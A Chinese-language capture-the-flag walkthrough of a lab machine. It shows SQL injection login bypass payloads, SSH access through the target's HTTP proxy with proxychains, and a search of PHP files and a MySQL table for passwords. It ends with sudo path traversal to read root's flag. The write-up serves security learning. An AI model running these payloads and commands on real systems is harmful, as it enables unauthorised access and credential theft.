第一步:nmap
第二步:SQL注入测试,获得john权限
e-mail:test' password:test'
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test''' at line 1]
对单引号有反应,首先尝试万能密码: ' or 1=1 -- 尝试
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '11 ' and password=' ' 11 '' at line 1]
看来等号是没了,不过可以用 > < <> 代替
使用intruder中的 pitchfork模块来暴力破解,这里发现出现了几种不同的字符,直接repeater中使用复制回显,这里发现绕过并成功显示用户名信息。
使用SQLi Payloads
Username: john
Password: hereisjohn
第三步:尝试使用代理链接ssh
无法直接ssh链接
proxychains使用方法
-
安装ProxyChains:在终端中输入命令sudo apt-get install proxychains4来安装ProxyChains。
-
修改配置文件:使用sudo vim /etc/proxychains.conf命令来打开配置文件,并在文件末尾加上代理服务器的地址。
vi /etc/proxychains4.conf
/ProxyList
http 192.168.56.108 3128
将http流量代理到目标主机 3128端口
保存之后,尝试使用代理登录目标主机
proxychains ssh john@192.168.56.108
成功连接的同时被注销了会话,然而这样却可以执行
我们直接proxychains4 ssh john@192.168.56.108 /bin/bash
第四步:尝试寻找包含密码的文件
/bin/sh -i
find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C20 -i pass
mysql用户名密码都是root,查看存在哪些数据库,查看SkyTech这个数据库
mysql -uroot -proot -e 'show databases;'
mysql -uroot -proot -e 'use SkyTech; show tables;'
mysql -uroot -proot -e 'use SkyTech; select * from login;'
获得三个用户名密码
第五步:利用sara用户进行连接,通过sudo越权
proxychains4 ssh sara@192.168.56.108 /bin/bash
/bin/sh -i
发现对这个accounts的目录是有sudo权限的,但是我们无法sudo,因为我们没有ttyshell,我们可以看看bashrc文件,看看bash是如何设置为交互式运行的
cat .bashrc,发现末尾有个退出
我们直接把.bashrc删掉,再试试
sudo cat /accounts/../root/flag.txt
可以目录遍历到拿取旗帜,root密码也在里面
获取root权限
完结撒花~